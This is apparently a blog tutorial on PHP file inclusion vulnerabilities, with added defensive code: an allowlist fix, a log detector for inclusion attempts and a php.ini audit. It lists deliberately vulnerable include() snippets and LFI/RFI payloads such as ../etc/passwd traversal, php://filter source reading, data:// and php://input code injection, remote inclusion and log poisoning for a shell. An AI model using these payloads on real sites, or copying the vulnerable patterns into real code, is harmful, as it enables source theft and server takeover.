Web security: file inclusion vulnerabilities

What is file inclusion?

Developers usually put functions they want to reuse into a single file; any script that needs one of those functions simply includes that file instead of writing the code again. This practice is called file inclusion.
For example: include "conn.php"

Common PHP file inclusion functions

  • include()
    Includes and executes the named file. If the file cannot be found, PHP emits a warning and continues executing the script.
  • include_once()
    Same as include(), except that if the same file is included repeatedly it is loaded only once.
  • require()
    Differs from include() in that when the file cannot be loaded, PHP emits a fatal error and terminates the script.
  • require_once()
    Same as require(), except that if the same file is required repeatedly it is loaded only once.

The difference

  • include: if the included file does not exist, the script continues
  • require: if the included file does not exist, the script stops executing
    (if the included file has a syntax error, neither continues; if the file cannot be found, include continues and require stops)

Principle of file inclusion vulnerabilities
A file inclusion vulnerability arises when the name of the file being included is controllable by the user and the incoming file name is not properly checked, or the check can be bypassed.

Common vulnerable code

<?php
// Vulnerable: the include path is taken directly from the request
if(isset($_GET['page'])){
	 include $_GET['page'];
}else{
	 include "home.php";
}
?>

Impact of file inclusion vulnerabilities

  • Combined with a file upload vulnerability: GetShell (obtain a webshell)
  • Execution of arbitrary script code
  • Leakage of website source code and configuration files
  • Remote inclusion leading to GetShell
  • Control of the entire site or even the server

Classification of file inclusion vulnerabilities

  • Local file inclusion (LFI): the included file is on the local server.
  • Remote file inclusion (RFI): the cause is the same as for local file inclusion, but when the php.ini options allow_url_include and allow_url_fopen are both On, a file from a third-party server can be included, forming a remote file inclusion vulnerability.

Exploiting local file inclusion

  • Upload an image webshell (picture Trojan), then include the image to get a shell
  • Read the website source code and configuration files
  • Include log files to get a shell

Image upload inclusion, case _001

<?php
// Case _001: the whole path comes from the request
if(isset($_GET['page'])){
	  include($_GET['page']);
}else{
	  include 'show.php';
}
?>

Image upload inclusion, case _002

<?php
// Case _002: a fixed directory prefix, but the rest of the path is still user-controlled
if(isset($_GET['page'])){
	  include('./action/' . $_GET['page']);
}else{
	  include './action/show.php';
}
?>

Image upload inclusion, case _003

<?php
// Case _003: fixed prefix and a '.php' suffix appended to the user-controlled name
if(isset($_GET['page'])){
	 include('./action/'. $_GET['page'] . '.php');
}else{
	 include './action/show.php';
}
?>
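All three cases above, and the common vulnerable snippet earlier on the page, concatenate or pass through a request parameter as an include path. The following is an added example (not code from the original post) of the safe pattern: the request parameter is only ever used as a key into a fixed allowlist, and the resolved path is confirmed to sit under the intended directory. The page names and the ./action directory layout are assumptions for the example.

```php
<?php
// Added example: allowlist-based dispatch replacing the vulnerable
// include($_GET['page']) patterns. No user-supplied string is ever
// concatenated into the include path.

// Assumed layout: ./action/show.php, ./action/list.php, ./action/about.php
const PAGE_DIR = __DIR__ . '/action';
const ALLOWED_PAGES = [
    'show'  => 'show.php',
    'list'  => 'list.php',
    'about' => 'about.php',
];

/**
 * Map a user-supplied page key to an absolute file path.
 * Returns null when the key is not allowlisted or the resolved
 * file does not live under PAGE_DIR.
 */
function resolve_page(string $requested): ?string
{
    if (!array_key_exists($requested, ALLOWED_PAGES)) {
        return null;
    }
    $path = realpath(PAGE_DIR . '/' . ALLOWED_PAGES[$requested]);
    $base = realpath(PAGE_DIR);
    // Defence in depth: even with a fixed map, confirm the canonical path
    // still starts with the canonical base directory plus a separator.
    if ($path === false || $base === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

$page = (isset($_GET['page']) && is_string($_GET['page'])) ? $_GET['page'] : 'show';
$file = resolve_page($page);
if ($file === null) {
    http_response_code(404);
    exit('Unknown page');
}
include $file;
```

Because the parameter is compared against map keys rather than used as a path fragment, the null-byte, path-length and wrapper tricks described later on this page have nothing to operate on: "../x", "php://filter/..." and "show%00" are simply not keys in the map, so the request ends in a 404 before include() is reached.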

%00 truncation

  • /etc/passwd%00
  • Requires magic_quotes_gpc = Off; only works on PHP versions below 5.3.4

Path length truncation

  • /etc/passwd././././././././././././.[…]/././././././././.
  • Only works on PHP versions below 5.2.8; on Linux the file name must be longer than 4096 bytes, on Windows longer than 256

Reading local server files

  • ?page=../../../../../../../etc/passwd

Reading the website source files
index.php?page=php://filter/read=convert.base64-encode/resource=index.php

Pseudo-protocols (stream wrappers):

  • Direct inclusion of a Trojan file: it can be an image, a txt file, an archive ...
  • ?page=php://input   receives the body of a POST request
    requires only allow_url_include to be enabled
  • ?page=http://172.18.11.66/0831/1.txt
    requires allow_url_fopen and allow_url_include to be enabled (remote inclusion)
  • ?page=php://filter/read=convert.base64-encode/resource=main.php   (reads a source code file)
  • ?page=data://text/plain,<?php phpinfo();?>
    requires allow_url_fopen and allow_url_include to be enabled

Including log files to get a shell

  1. First, find the location of the log file
  2. Get PHP code written into the log file
  3. Include the log file

Using remote file inclusion
Include a remote txt file (requires the php.ini options allow_url_include and allow_url_fopen to be On). Store on a remote server either a txt file or a php file that the remote server does not parse. (The remote server must return the PHP source code itself; if it parsed the file, the source would not come back and could not be included as code.)

index.php?page=http://www.xxx.com/1.txt

Vulnerability mining

  • There is no universal method of discovery
  • For a specific CMS, specific versions may have known inclusion vulnerabilities (include, require)
  • Web vulnerability scanners: common scanners can detect this class of vulnerability
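Scanning for the vulnerability is one side of discovery; the other is noticing attempts against a live site. The following is an added example (not from the original post) of detection logic that reads web server access log lines and flags the request shapes this page describes: directory traversal, php:// and data: wrappers, a remote URL in the page parameter, and a null byte. It assumes a combined-format access log with the page parameter named page; the log lines are constructed for the example.

```php
<?php
// Added example: flag file-inclusion attempts in access log lines.
// The log lines are constructed sample data, not a real server's log.

const LOG_LINES = [
    '10.0.0.5 - - [01/Jul/2019:10:00:01 +0800] "GET /index.php?page=about HTTP/1.1" 200 512',
    '10.0.0.6 - - [01/Jul/2019:10:00:02 +0800] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 1843',
    '10.0.0.7 - - [01/Jul/2019:10:00:03 +0800] "GET /index.php?page=php://filter/read=convert.base64-encode/resource=index.php HTTP/1.1" 200 3000',
    '10.0.0.8 - - [01/Jul/2019:10:00:04 +0800] "GET /index.php?page=http://example.invalid/1.txt HTTP/1.1" 500 0',
    '10.0.0.9 - - [01/Jul/2019:10:00:05 +0800] "GET /index.php?page=show%00.png HTTP/1.1" 200 512',
];

// Indicator patterns, applied to the URL-decoded request target.
const PATTERNS = [
    'path traversal' => '#\.\./|\.\.\\\\#',        // ../ or ..\
    'php wrapper'    => '#php://(?:filter|input)#i',
    'data wrapper'   => '#data:(?://)?text/#i',
    'remote url'     => '#[?&]page=(?:https?|ftp)://#i',
    'null byte'      => '#\x00#',                   // %00 after decoding
];

/**
 * Return the list of indicator labels that match one log line.
 * An empty list means the request looked ordinary.
 */
function classify_request(string $line): array
{
    // Pull the request target out of the quoted "METHOD target HTTP/x" field
    if (!preg_match('#"[A-Z]+ ([^ "]+) HTTP/#', $line, $m)) {
        return [];
    }
    // Decode once so %2e%2e%2f and %00 are seen in their decoded form
    $target = rawurldecode($m[1]);
    $hits = [];
    foreach (PATTERNS as $label => $regex) {
        if (preg_match($regex, $target)) {
            $hits[] = $label;
        }
    }
    return $hits;
}

/** Scan many lines and report 1-based line numbers with their indicators. */
function scan_log(array $lines): array
{
    $report = [];
    foreach ($lines as $index => $line) {
        $hits = classify_request($line);
        if ($hits) {
            $report[] = ['line' => $index + 1, 'indicators' => $hits];
        }
    }
    return $report;
}

foreach (scan_log(LOG_LINES) as $entry) {
    printf("line %d: %s\n", $entry['line'], implode(', ', $entry['indicators']));
}
```

Run against the sample, lines 2 to 5 are reported (traversal, php wrapper, remote url, null byte) and line 1 is not. Decoding once before matching is what lets the rules stay short; logs that store the raw encoded request would otherwise need a separate pattern for every encoding of "../".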

Remedy

  • Use the PHP open_basedir setting to restrict file access to a specified directory
  • Filter . (dot), / (slash) and \ (backslash) out of the parameter
  • Prohibit remote file inclusion on the server
    (set allow_url_fopen and allow_url_include to Off)
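The first and third items of the remedy list are php.ini settings, so they can be checked rather than assumed. The following is an added example (not from the original post) of a small audit routine: it evaluates a set of configuration values against the remedy list, runs first over two constructed configurations (one weak, one hardened) and then over the live interpreter's values via ini_get(). The open_basedir paths in the hardened sample are assumptions.

```php
<?php
// Added example: audit the php.ini settings named in the remedy list.
// audit_include_config() takes an array of values so it can be exercised
// on constructed input; the last block feeds it the live configuration.

/**
 * Return findings for the settings that govern file inclusion risk.
 * An empty list means the configuration matches the remedy list.
 */
function audit_include_config(array $ini): array
{
    $findings = [];
    foreach (['allow_url_fopen', 'allow_url_include'] as $key) {
        // ini_get() yields "1" or "" for booleans; php.ini text may say On/Off.
        // FILTER_VALIDATE_BOOLEAN accepts 1/true/on/yes as true.
        $value = $ini[$key] ?? '';
        if (filter_var($value, FILTER_VALIDATE_BOOLEAN)) {
            $findings[] = "$key is On; set it to Off unless remote wrappers are genuinely required";
        }
    }
    $base = trim((string) ($ini['open_basedir'] ?? ''));
    if ($base === '') {
        $findings[] = 'open_basedir is not set; restrict it to the web root and temp directory';
    } elseif (in_array('/', explode(PATH_SEPARATOR, $base), true)) {
        $findings[] = 'open_basedir contains "/", which restricts nothing';
    }
    return $findings;
}

// Constructed sample: the configuration that makes remote inclusion possible.
$weak = [
    'allow_url_fopen'   => 'On',
    'allow_url_include' => 'On',
    'open_basedir'      => '',
];
// Constructed sample: the configuration the remedy list asks for (paths assumed).
$hardened = [
    'allow_url_fopen'   => 'Off',
    'allow_url_include' => 'Off',
    'open_basedir'      => '/var/www/site/:/tmp/',
];

foreach (['weak' => $weak, 'hardened' => $hardened] as $label => $config) {
    $findings = audit_include_config($config);
    echo "$label: ", $findings ? implode('; ', $findings) : 'OK', "\n";
}

// Live check of the interpreter this script runs under.
$live = [];
foreach (['allow_url_fopen', 'allow_url_include', 'open_basedir'] as $key) {
    $live[$key] = ini_get($key);
}
$liveFindings = audit_include_config($live);
echo 'live: ', $liveFindings ? implode('; ', $liveFindings) : 'OK', "\n";
```

The weak sample produces three findings and the hardened sample none. Note that allow_url_fopen is also what lets ordinary code call file_get_contents() on a URL, so turning it Off needs a check that the application does not depend on it; allow_url_include has no such legitimate everyday use and is the one setting that directly gates the php://input, data: and http:// inclusion cases listed above.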


Origin blog.csdn.net/qq_37133717/article/details/94631028